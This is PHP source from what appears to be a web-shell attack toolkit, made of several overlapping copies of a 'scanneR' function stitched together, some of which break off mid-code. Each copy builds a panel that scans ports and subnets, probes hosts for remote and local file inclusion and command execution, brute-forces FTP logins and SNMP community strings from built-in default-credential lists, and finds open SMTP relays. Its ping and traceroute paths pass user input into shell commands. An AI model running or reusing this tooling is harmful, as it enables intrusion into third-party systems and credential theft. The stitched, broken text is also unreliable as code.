function scanneR()
{
global $hcwd, $et;
if (!empty($_SERVER['SERVER_ADDR'])) {
$host = $_SERVER['SERVER_ADDR'];
} else {
$host = '127.0.0.1';
}
$udp = empty($_REQUEST['udp']) ? 0 : 1;
$tcp = empty($_REQUEST['tcp']) ? 0 : 1;
if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
$target = $_REQUEST['target'];
$from = (int) $_REQUEST['fromport'];
$to = (int) $_REQUEST['toport'];
$timeout = (int) $_REQUEST['timeout'];
$nu = 0;
echo '<font color=blue>Port scanning started against ' . htmlspecialchars($target) . ':<br>';
$start = time();
for ($i = $from; $i <= $to; $i++) {
if ($tcp) {
if (checkthisporT($target, $i, $timeout)) {
$nu++;
$ser = '';
if (getservbyport($i, 'tcp')) {
$ser = '(' . getservbyport($i, 'tcp') . ')';
}
echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
}
}
if ($udp) {
if (checkthisporT($target, $i, $timeout, 1)) {
$nu++;
$ser = '';
if (getservbyport($i, 'udp')) {
$ser = '(' . getservbyport($i, 'udp') . ')';
}
echo "{$nu}) {$i} {$ser} [UDP]<br>";
}
}
}
$time = time() - $start;
echo "Done! ({$time} seconds)</font>";
} elseif (!empty($_REQUEST['securityscanner'])) {
echo '<font color=blue>';
$start = time();
$from = $_REQUEST['from'];
$to = (int) $_REQUEST['to'];
$timeout = (int) $_REQUEST['timeout'];
$f = substr($from, strrpos($from, '.') + 1);
$from = substr($from, 0, strrpos($from, '.'));
if (!empty($_REQUEST['httpscanner'])) {
echo 'Loading webserver bug list...';
$buglist = whereistmP() . DIRECTORY_SEPARATOR . uniqid('BL');
$dl = downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
if ($dl) {
$file = file($buglist);
echo 'Done! scanning started.<br><br>';
} else {
echo 'Failed!!! scanning started without webserver security testing...<br><br>';
}
} else {
$fr = htmlspecialchars($from);
echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
}
for ($i = $f; $i <= $to; $i++) {
$output = 0;
$ip = "{$from}.{$i}";
if (!empty($_REQUEST['nslookup'])) {
$hn = gethostbyaddr($ip);
if ($hn != $ip) {
echo "{$ip} [{$hn}]<br>";
}
$output = 1;
}
if (!empty($_REQUEST['ipscanner'])) {
$port = $_REQUEST['port'];
if (strstr($port, ',')) {
$p = explode(',', $port);
} else {
$p[0] = $port;
}
$open = $ser = '';
foreach ($p as $po) {
$scan = checkthisporT($ip, $po, $timeout);
if ($scan) {
$ser = '';
if ($ser = getservbyport($po, 'tcp')) {
$ser = "({$ser})";
}
$open .= " {$po}{$ser} ";
}
}
if ($open) {
echo "{$ip}) Open ports:{$open}<br>";
$output = 1;
}
}
if (!empty($_REQUEST['httpbanner'])) {
$res = get_sw_namE($ip, $timeout);
if ($res) {
echo "{$ip}) Webserver software: ";
if ($res == -1) {
echo 'Unknow';
} else {
echo $res;
}
echo '<br>';
$output = 1;
}
}
if (!empty($_REQUEST['httpscanner'])) {
if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
$admin = array('/admin/', '/adm/');
$users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
$nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
$cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
foreach ($file as $v) {
$vuln = array();
$v = trim($v);
if (!$v || $v[0] == '#') {
continue;
}
$v = str_replace('","', '^', $v);
$v = str_replace('"', '', $v);
$vuln = explode('^', $v);
$page = $cqich = $nukech = $adminch = $userch = $vuln[1];
if (strstr($page, '@CGIDIRS')) {
foreach ($cgi as $cg) {
$cqich = str_replace('@CGIDIRS', $cg, $page);
$url = "http://{$ip}{$cqich}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
} elseif (strstr($page, '@ADMINDIRS')) {
foreach ($admin as $cg) {
$adminch = str_replace('@ADMINDIRS', $cg, $page);
$url = "http://{$ip}{$adminch}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
} elseif (strstr($page, '@USERS')) {
foreach ($users as $cg) {
$userch = str_replace('@USERS', $cg, $page);
$url = "http://{$ip}{$userch}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
} elseif (strstr($page, '@NUKE')) {
foreach ($nuke as $cg) {
$nukech = str_replace('@NUKE', $cg, $page);
$url = "http://{$ip}{$nukech}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
} else {
$url = "http://{$ip}{$page}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
}
}
}
}
}
if (!empty($_REQUEST['smtprelay'])) {
if (checkthisporT($ip, 25, $timeout)) {
$res = '';
$res = checksmtP($ip, $timeout);
if ($res == 1) {
echo "{$ip}) SMTP relay found.<br>";
$output = 1;
}
}
}
if (!empty($_REQUEST['snmpscanner'])) {
if (checkthisporT($ip, 161, $timeout, 1)) {
$com = $_REQUEST['com'];
$coms = $res = '';
if (strstr($com, ',')) {
$c = explode(',', $com);
} else {
$c[0] = $com;
}
foreach ($c as $v) {
$ret = snmpchecK($ip, $v, $timeout);
if ($ret) {
$coms .= " {$v} ";
}
}
if ($coms != '') {
echo "{$ip}) SNMP FOUND: {$coms}<br>";
$output = 1;
}
}
}
if (!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')) {
if (checkthisporT($ip, 21, $timeout)) {
$usps = explode(',', $_REQUEST['userpass']);
foreach ($usps as $v) {
$user = substr($v, 0, strpos($v, ':'));
$pass = substr($v, strpos($v, ':') + 1);
if ($pass == '[BLANK]') {
$pass = '';
}
$ftp = ftp_connect($ip, 21, $timeout);
if ($ftp) {
if (ftp_login($ftp, $user, $pass)) {
$output = 1;
echo "{$ip}) FTP FOUND: ({$user}:{$pass}) System type: " . ftp_systype($ftp) . " (<b><a href='";
echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
echo "' target='_blank'>Connect</a></b>)<br>";
}
}
}
}
}
if ($output) {
echo '<hr size=1 noshade>';
}
}
$time = time() - $start;
echo "Done! ({$time} seconds)</font>";
if (!empty($buglist)) {
unlink($buglist);
}
} elseif (!empty($_REQUEST['directoryscanner'])) {
$dir = file($_REQUEST['dic']);
$host = $_REQUEST['host'];
$r = $_REQUEST['r1'];
echo "<font color=blue><pre>Tahap Scanning Dimulai ...\n";
for ($i = 0; $i < count($dir); $i++) {
$d = trim($dir[$i]);
if ($r) {
$adr = "http://{$host}/{$d}/";
if (check_urL($adr, 'GET', '302')) {
echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
}
} else {
$adr = "{$d}.{$host}";
$ip = gethostbyname($adr);
if ($ip != $adr) {
echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
}
}
}
echo 'Done!</pre></font>';
} else {
$t = "<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
$chbox = extension_loaded('sockets') ? "<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
echo "<center>{$t}><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>{$chbox}</td><td bgcolor='#808080' align='right'>{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></form>{$et}{$t}><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='" . $_SERVER["HTTP_HOST"] . "' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
$host = substr($host, 0, strrpos($host, "."));
echo "{$t} name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH\$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>{$et}";
}
}
function scanneR()
{
global $windows, $hcwd, $Resource_Dir, $RFI_URL;
if (!empty($_SERVER['SERVER_ADDR'])) {
$host = $_SERVER['SERVER_ADDR'];
} else {
$host = '127.0.0.1';
}
$udp = empty($_REQUEST['udp']) ? 0 : 1;
$tcp = empty($_REQUEST['tcp']) ? 0 : 1;
if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
$target = $_REQUEST['target'];
$from = (int) $_REQUEST['fromport'];
$to = (int) $_REQUEST['toport'];
$timeout = (int) $_REQUEST['timeout'];
$nu = 0;
echo '<font color=#FA0>Port scanning started against ' . htmlspecialchars($target) . ':<br />';
$start = time();
for ($i = $from; $i <= $to; $i++) {
if ($tcp) {
if (checkthisporT($target, $i, $timeout)) {
$nu++;
$ser = '';
if (getservbyport($i, 'tcp')) {
$ser = '(' . getservbyport($i, 'tcp') . ')';
}
echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
}
}
if ($udp) {
if (checkthisporT($target, $i, $timeout, 1)) {
$nu++;
$ser = '';
if (getservbyport($i, 'udp')) {
$ser = '(' . getservbyport($i, 'udp') . ')';
}
echo "{$nu}) {$i} {$ser} [UDP]<br>";
}
}
}
$time = time() - $start;
echo "Done! ({$time} seconds)</font>";
} elseif (!empty($_REQUEST['securityscanner'])) {
echo '<font color=#FA0><pre>';
$start = time();
$from = $_REQUEST['from'];
$to = $_REQUEST['to'];
$fIP = ip2long($from);
$tIP = ip2long($to);
if ($fIP > $tIP) {
echo 'Invalid range!</pre></font>';
return 0;
}
$timeout = (int) $_REQUEST['timeout'];
if (!empty($_REQUEST['httpscanner'])) {
echo 'Loading web-server vulnerability DBs...<br />';
@flush_buffers();
$DBs = array('Directory', 'Files', 'RFI', 'LFI', 'RCE');
$file = array();
foreach ($DBs as $db) {
$buglist = whereistmP() . DIRECTORY_SEPARATOR . "{$db}.pj";
$dl = !file_exists($buglist) ? downloadiT($Resource_Dir . "scan_db/{$db}.txt", $buglist) : true;
if ($dl) {
$file[$db] = file($buglist);
echo "'{$db}' database Loaded.<br />";
} else {
echo "Can not load '{$db}' database.<br />";
}
@flush_buffers();
}
}
$fr = htmlspecialchars($from);
echo "<br />Scanning {$fr}-{$to}:<br />";
for ($i = $fIP; $i <= $tIP; $i++) {
$ip = long2ip($i);
echo "<br /><br />---------------- {$ip} ----------------<br />";
if (!empty($_REQUEST['nslookup'])) {
$hn = gethostbyaddr($ip);
if ($hn != $ip) {
echo "-- Hostname: {$hn}<br />";
}
}
@flush_buffers();
if (!empty($_REQUEST['ping'])) {
echo "-- Ping:<br />";
$pres = !$windows ? shelL("ping -c 1 -W {$timeout} {$ip}") : shelL("ping -n 1 -w {$timeout} {$ip}");
if (strstr($pres, 'Received = 0') || strstr($pres, '0 received')) {
echo "Ping timeout!<br />";
continue;
} else {
echo '<font color="#E9CFEC">' . $pres . '</font><br />';
}
@flush_buffers();
}
if (!empty($_REQUEST['tracert'])) {
echo "-- Traceroute:<br />";
$tres = !$windows ? shelL("traceroute -w {$timeout} {$ip}") : shelL("tracert -w {$timeout} {$ip}");
echo '<font color="#E9CFEC">' . $tres . '</font><br />';
@flush_buffers();
}
if (!empty($_REQUEST['tcppscanner'])) {
$port = $_REQUEST['port'];
if (strstr($port, ',')) {
$p = explode(',', $port);
} else {
$p[0] = $port;
}
$open = $ser = '';
foreach ($p as $po) {
$scan = checkthisporT($ip, $po, $timeout);
if ($scan) {
$ser = '';
if ($ser = getservbyport($po, 'tcp')) {
$ser = "({$ser})";
}
$open .= " {$po}{$ser} ";
}
}
if ($open) {
echo "-- TCP open ports:{$open}<br />";
@flush_buffers();
}
}
if (!empty($_REQUEST['udppscanner'])) {
$port = $_REQUEST['udport'];
if (strstr($port, ',')) {
$p = explode(',', $port);
} else {
$p[0] = $port;
}
$open = $ser = '';
foreach ($p as $po) {
$scan = checkthisporT($ip, $po, $timeout, 1);
if ($scan) {
$ser = '';
if ($ser = getservbyport($po, 'tcp')) {
$ser = "({$ser})";
}
$open .= " {$po}{$ser} ";
}
}
if ($open) {
echo "-- UDP open ports:{$open}<br>";
@flush_buffers();
}
}
if (!empty($_REQUEST['httpbanner'])) {
$res = get_sw_namE($ip, $timeout);
if ($res) {
echo "-- Webserver software: ";
if ($res) {
echo 'Unknow';
} else {
echo $res;
}
echo '<br />';
@flush_buffers();
}
}
if (!empty($_REQUEST['httpscanner'])) {
echo "-- Webserver security:<br />";
if (checkthisporT($ip, 80, $timeout) && !empty($file) && !check_urL('http://' . $ip . '/' . uniqid('TEST_'), 'GET', '200 301 302 403', $timeout)) {
echo "Directory scan:<br />";
foreach ($file['Directory'] as $k => $v) {
@flush_buffers();
$v = trim($v);
$res = check_urL('http://' . $ip . '/' . $v, 'GET', '200 301 302 403', $timeout);
if ($res) {
echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a> ({$res})<br />";
}
}
echo "File scan:<br />";
foreach ($file['Files'] as $k => $v) {
@flush_buffers();
$v = trim($v);
$res = check_urL('http://' . $ip . '/' . $v, 'GET', '200 301 302 403', $timeout);
if ($res) {
echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a> ({$res})<br />";
}
}
echo "RFI scan:<br />";
foreach ($file['RFI'] as $k => $v) {
@flush_buffers();
$v = trim($v);
$v = str_replace('%RFI%', $RFI_URL, $v);
if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'NetJackal')) {
echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
}
}
echo "RCE scan:<br />";
foreach ($file['RCE'] as $k => $v) {
$v = trim($v);
$v = str_replace('%RFI%', $RFI_URL, $v);
if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'root:')) {
echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
}
}
echo "LFI scan:<br />";
foreach ($file['LFI'] as $k => $v) {
@flush_buffers();
$v = trim($v);
$v = str_replace('%RFI%', $RFI_URL, $v);
if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'root:')) {
echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
}
}
}
}
if (!empty($_REQUEST['smtprelay'])) {
if (checkthisporT($ip, 25, $timeout)) {
$res = '';
$res = checksmtP($ip, $timeout);
if ($res == 1) {
echo "-- SMTP relay found.<br />";
@flush_buffers();
}
}
}
if (!empty($_REQUEST['snmpscanner'])) {
if (checkthisporT($ip, 161, $timeout, 1)) {
$com = $_REQUEST['com'];
$coms = $res = '';
if (strstr($com, ',')) {
$c = explode(',', $com);
} else {
$c[0] = $com;
}
foreach ($c as $v) {
$ret = snmpchecK($ip, $v, $timeout);
if ($ret) {
$coms .= " {$v} ";
}
}
if ($coms != '') {
echo "-- SNMP FOUND: {$coms}<br />";
@flush_buffers();
}
}
}
if (!empty($_REQUEST['ftpscanner']) && checkfunctioN('ftp_connect')) {
if (checkthisporT($ip, 21, $timeout)) {
$usps = explode(',', $_REQUEST['userpass']);
foreach ($usps as $v) {
$user = substr($v, 0, strpos($v, ':'));
$pass = substr($v, strpos($v, ':') + 1);
if ($pass == '[BLANK]') {
$pass = '';
}
if (ftpchecK($ip, $user, $pass, $timeout)) {
echo "-- FTP FOUND: ({$user}:{$pass}) (<b><a href='";
echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
echo "' target='_blank'>Connect</a></b>)<br />";
@flush_buffers();
}
}
}
}
}
$time = time() - $start;
echo "Done! ({$time} seconds)</pre></font>";
} elseif (!empty($_REQUEST['directoryscanner'])) {
$dir = file($_REQUEST['dic']);
$host = $_REQUEST['host'];
$r = $_REQUEST['r1'];
echo "<font color=#FA0><pre>Scanning started...\n";
for ($i = 0; $i < count($dir); $i++) {
$d = trim($dir[$i]);
if ($r) {
$adr = "http://{$host}/{$d}/";
if (check_urL($adr, 'GET')) {
echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
}
} else {
$adr = "{$d}.{$host}";
$ip = gethostbyname($adr);
if ($ip != $adr) {
echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
}
}
}
echo 'Done!</pre></font>';
} else {
$chbox = checkfunctioN('socket_set_timeout') ? "<ul><li><input type=checkbox name=tcp value=1 checked> <lable>TCP</lable></li><li><input type=checkbox name=udp value=1 checked> <lable>UDP</lable></li></ul>" : '<input type="hidden" name="tcp" value="1">';
echo '<form name=port method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Port scanner</label></div><div class="fieldwrapper"><label class="styled">Target:</label><div class="thefield"><input type="text" name="target" value="' . $host . '" size="30" /></div></div><div class="fieldwrapper"><label class="styled">From:</label><div class="thefield"><input type="number" min="1" max="65535" name="fromport" value="1" size="30" /></div></div><div class="fieldwrapper"><label class="styled">To:</label><div class="thefield"><input type="number" min="1" max="65535" name="toport" value="1024" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Options:</label><div class="thefield"><ul style="margin-top:0;"><li><label>Timeout:</label> <input type="number" min="1" name="timeout" size="5" value="2"></li>' . $chbox . '</u></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="portscanner" value="Scan" style="margin-left: 150px;" /></div></form><br /><form name=disc method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Discover</label></div><div class="fieldwrapper"><label class="styled">Target:</label><div class="thefield"><input type="text" name="host" value="' . $_SERVER["HTTP_HOST"] . '" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Dictionary:</label><div class="thefield"><input type="text" name="dic" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Search for:</label><div class="thefield"><ul><li><input type=radio value=1 checked name=r1> <label>Directories</label></li><li><input type=radio name=r1 value=0> <label>Subdomains</label></li></ul></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="directoryscanner" value="Scan" style="margin-left: 150px;" /></div></form>';
$host = substr($host, 0, strrpos($host, "."));
$udpf = checkfunctioN('socket_set_timeout') ? '<li><input type=checkbox name=udppscanner value=1 checked onClick="document.security.udpf.disabled = !document.security.udpf.disabled;"> <label>UDP Port scanner:</label> <input name=udport type=text value="53,69,88,111,137,138,139,389,445" size="30"></li>' : '';
echo '<form name=security method="POST"><div class="fieldwrapper"><label class="styled" style="width:320px">Security scanner</label></div><div class="fieldwrapper"><label class="styled">From:</label><div class="thefield"><input type="text" name="from" value="' . $host . '.1" size="30" /></div></div><div class="fieldwrapper"><label class="styled">To:</label><div class="thefield"><input type="text" name="to" value="' . $host . '.255" size="30" /></div></div><div class="fieldwrapper"><label class="styled">Options:</label><div class="thefield"><ul style="margin-top:0;"><li><input type="checkbox" value="1" name="nslookup" checked> <label>NS lookup</label></li><li><label>Timeout:</label> <input type="number" min="1" name="timeout" size="5" value="2"></li><li><input type="checkbox" value="1" name="ping" checked><label>Only scan hosts with echo reply</label></li><li><input type="checkbox" value="1" name="tracert" checked><label>Traceroute</label></li><li><input type=checkbox name=tcppscanner value=1 checked onClick="document.security.port.disabled = !document.security.port.disabled;"> <label>TCP Port scanner:</label> <input name=port type=text value="21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301" size="30"></li>' . $udpf . '<li><input type=checkbox name=httpbanner value=1 checked> <label>Grab HTTP headers</label></li><li><input type=checkbox name=httpscanner value=1 checked> <label>Webserver security scanning</label></li><li><input type=checkbox name=smtprelay value=1 checked> <label>SMTP relay check</label></li>';
if (function_exists('ftp_connect')) {
echo '<li><input type=checkbox name=ftpscanner value=1 checked onClick="document.security.userpass.disabled = !document.security.userpass.disabled;"> <label>FTP password:</label><input name=userpass type=text value="anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]" size=30></li>';
}
echo '<li><input type=checkbox name=snmpscanner value=1 onClick="document.security.com.disabled = !document.security.com.disabled;" checked> <label>SNMP:</label> <input name=com type=text value="public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes" size=30></li></u></div></div>' . $hcwd . '<div class="buttonsdiv"><input type="submit" name="securityscanner" value="Scan" style="margin-left: 150px;" /></div></form>';
}
}
} else {
$url = "http://{$ip}{$page}";
$res = check_urL($url, $vuln[3], $vuln[2], $timeout);
if ($res) {
$output = 1;
echo "{$ip})" . $vuln[4] . " <a href=\"{$url}\" target=\"_blank\">{$url}</a><br>";
}
flusheR();
}
}
}
}
if (!empty($_REQUEST['smtprelay'])) {
if (checkthisporT($ip, 25, $timeout)) {
$res = '';
$res = checksmtP($ip, $timeout);
if ($res == 1) {
echo "{$ip}) SMTP relay found.<br>";
$output = 1;
}
flusheR();
}
}
if (!empty($_REQUEST['snmpscanner'])) {
if (checkthisporT($ip, 161, $timeout, 1)) {
$com = $_REQUEST['com'];
$coms = $res = "";
if (strstr($com, ",")) {
$c = explode(",", $com);
} else {
$c[0] = $com;
function scanneR()
{
global $hcwd;
if (!empty($_SERVER["SERVER_ADDR"])) {
$host = $_SERVER["SERVER_ADDR"];
} else {
$host = "127.0.0.1";
}
$udp = empty($_REQUEST['udp']) ? 0 : 1;
$tcp = empty($_REQUEST['tcp']) ? 0 : 1;
if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
$target = $_REQUEST['target'];
$from = (int) $_REQUEST['fromport'];
$to = (int) $_REQUEST['toport'];
$timeout = (int) $_REQUEST['timeout'];
$nu = 0;
echo "<font color=blue>Port scanning started against " . htmlspecialchars($target) . ":<br>";
$start = time();
for ($i = $from; $i <= $to; $i++) {
if ($tcp) {
if (checkthisporT($target, $i, $timeout)) {
$nu++;
$ser = "";
if (getservbyport($i, "tcp")) {
$ser = "(" . getservbyport($i, "tcp") . ")";
}
echo "{$nu}) {$i} {$ser} (<a href=\"telnet://{$target}:{$i}\">Connect</a>) [TCP]<br>";
}
}
if ($udp) {
if (checkthisporT($target, $i, $timeout, 1)) {
$nu++;
$ser = "";
if (getservbyport($i, "udp")) {
$ser = "(" . getservbyport($i, "udp") . ")";
}
echo "{$nu}) {$i} {$ser} [UDP]<br>";
}
}
flusheR();
}
$time = time() - $start;
echo "Done! ({$time} seconds)</font>";
} elseif (!empty($_REQUEST['securityscanner'])) {
echo "<font color=blue>";
$start = time();
$from = $_REQUEST['from'];
$to = (int) $_REQUEST['to'];
$timeout = (int) $_REQUEST['timeout'];
$f = substr($from, strrpos($from, ".") + 1);
$from = substr($from, 0, strrpos($from, "."));
if (!empty($_REQUEST['httpscanner'])) {
echo "Loading webserver bug list...";
flusheR();
$buglist = whereistmP() . DIRECTORY_SEPARATOR . namE();
$dl = @downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
if ($dl) {
$file = file($buglist);
echo "Done! scanning started.<br><br>";
} else {
echo "Failed!!! scanning started without webserver security testing...<br><br>";
}
flusheR();
} else {
$fr = htmlspecialchars($from);
echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
}
for ($i = $f; $i <= $to; $i++) {
$output = 0;
$ip = "{$from}.{$i}";
if (!empty($_REQUEST['nslookup'])) {
$hn = gethostbyaddr($ip);
if ($hn != $ip) {
echo "{$ip} [{$hn}]<br>";
}
}
flusheR();
if (!empty($_REQUEST['ipscanner'])) {
$port = $_REQUEST['port'];
if (strstr($port, ",")) {
$p = explode(",", $port);
} else {
$p[0] = $port;
}
$open = $ser = "";
foreach ($p as $po) {
$scan = checkthisporT($ip, $po, $timeout);
if ($scan) {
$ser = "";
if ($ser = getservbyport($po, "tcp")) {
$ser = "({$ser})";
}
$open .= " {$po}{$ser} ";
}
}
if ($open) {
echo "{$ip}) Open ports:{$open}<br>";
$output = 1;
}
flusheR();
}
if (!empty($_REQUEST['httpbanner'])) {
$res = get_sw_namE($ip, $timeout);
if ($res) {
echo "{$ip}) Webserver software: ";
if ($res == -1) {
echo "Unknow";
} else {
echo $res;
}
echo "<br>";
$output = 1;
}
flusheR();
}
if (!empty($_REQUEST['httpscanner'])) {
if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
$admin = array('/admin/', '/adm/');
$users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
$nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
